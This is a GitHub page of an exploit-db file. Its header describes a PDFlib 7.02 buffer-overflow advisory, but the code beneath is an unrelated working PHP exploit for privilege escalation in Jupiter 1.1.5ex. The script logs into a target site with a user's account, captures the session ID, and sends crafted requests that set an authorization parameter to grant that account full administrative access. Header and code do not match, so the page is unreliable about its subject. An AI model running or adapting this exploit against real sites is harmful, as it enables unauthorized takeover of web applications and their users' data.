forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path30928.php
More file actions
executable file
·144 lines (135 loc) · 4.86 KB
/
Copy path30928.php
File metadata and controls
executable file
·144 lines (135 loc) · 4.86 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
source: http://www.securityfocus.com/bid/27001/info
PDFlib is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input.
Attackers can exploit these issues to execute arbitrary code in the context of applications that use the library. Failed attacks will cause denial-of-service conditions.
PDFlib 7.02 is vulnerable; other versions may also be affected.
<?php
########################## WwW.BugReport.ir
###########################################
#
# AmnPardaz Security Research & Penetration Testing Group
#
# Title: Jupiter 1.1.5ex Privileges Escalation
# Vendor: http://www.jupiterportal.com
# original advisory: http://www.bugreport.ir/?/23
#######################################################################################
?>
<html dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Jupiter 1.1.5ex Privileges Escalation</title>
<style type="text/css" media="screen">
body {
font-size: 10px;
font-family: verdana;
}
INPUT {
BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH:
1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009;
BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #00ff00;
BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH:
1px; BORDER-RIGHT-COLOR: #D50428
}
</style>
</head>
<body dir="ltr" alink="#00ff00" bgcolor="#000000" link="#00c000"
text="#008000" vlink="#00c000">
<form method="POST" action="?">
Target URL (whit trailing slash) :<BR><BR>
http://<input type="text" name="target" value="www.example.com/jupiter/"
size="50"><BR><BR>
Username :<BR><BR>
<input type="text" name="username" size="30"><BR><BR>
Password :<BR><BR>
<input type="text" name="password" size="30"><BR><BR>
*First Create an account on target!<BR>
The exploit will login with this username and password and then grants
full access to this account!<BR><BR>
<input type="submit" name="start" value="Start">
</form>
<?php
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
function sendpacket($packet)
{
global $host, $html;
$port = 80;
$ock=fsockopen(gethostbyname($host),$port);
if ($ock)
{
fputs($ock,$packet);
$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
fclose($ock);
// echo nl2br(htmlentities($html));
}else die('<BR>No response from '.htmlentities($host).'<BR>');
}
if(isset($_POST['start']))
{
if ($_POST['target'] == '' || $_POST['username'] == '' ||
$_POST['username'] == '')
{
die('Error : All fields are required!');
}
$Target = trim($_POST['target']);
$Username = trim($_POST['username']);
$Password = trim($_POST['password']);
$Target .= ($Target[strlen($Target)-1] <> '/') ? '/' : '';
$host = substr($Target, 0 ,strpos($Target, '/'));
$path = substr($Target, strpos($Target, '/'));
$Query1 = $path.'index.php';
$packet1 = "HEAD $Query1 HTTP/1.1\r\n";
$packet1 .= "User-Agent: Shareaza v1.x.x.xx\r\n";
$packet1 .= "Host: ".$host."\r\n";
$packet1 .= "Connection: Close\r\n\r\n";
sendpacket($packet1);
echo nl2br(htmlentities($html));
$Pattern = "(PHPSESSID=[a-z0-9]{20,32})";
if(preg_match($Pattern, $html, $Matches))
{
$Match = $Matches[0];
$PHPSESSID = substr($Match, 10, strlen($Match));
}
$Query2 = $path.'index.php?n=modules/login';
$packet2 = "POST
$Query2&username=$Username&password=$Password&submit=Login&PHPSESSID=$PHPSESSID
HTTP/1.1\r\n";
$packet2 .= "User-Agent: Shareaza v1.x.x.xx\r\n";
$packet2 .= "Host: ".$host."\r\n";
$packet2 .= "Connection: Close\r\n\r\n";
sendpacket($packet2);
if(stristr($html , 'i=1') == true)
{
die('Error : Incorrect username or password! Try
again!');
} else
if(stristr($html , 'i=5') == true)
{
die('Error : Someone is currently using that account!');
} else
$RandMail = substr($PHPSESSID, 10, 6).'_mail@none.com';
$Query3 =
$path.'index.php?n=modules/panel&a=2&tmp[authorization]=4';
$packet3 = "POST
$Query3&editpassword=&editpassword2=&editemail=$RandMail&edittemplate=default&editurl=&editflag=none&editday=0&editmonth=0&edityear=0&edithideemail=0&editcalendarbday=0&editmsn=&edityahoo=&editicq=&editaim=&editskype=&editsignature=&editaboutme=&PHPSESSID=$PHPSESSID
HTTP/1.1\r\n";
$packet3 .= "User-Agent: Shareaza v1.x.x.xx\r\n";
$packet3 .= "Host: ".$host."\r\n";
$packet3 .= "Connection: Close\r\n\r\n";
sendpacket($packet3);
if(stristr($html , 'i=26') == false)
{
die('Exploit Failed');
}
$Query4 = $path.'index.php?n=modules/login&a=1';
$packet4 = "POST $Query4&PHPSESSID=$PHPSESSID HTTP/1.1\r\n";
$packet4 .= "User-Agent: Shareaza v1.x.x.xx\r\n";
$packet4 .= "Host: ".$host."\r\n";
$packet4 .= "Connection: Close\r\n\r\n";
sendpacket($packet4);
die('Exploit succeeded! You have Full access now!');
}
?>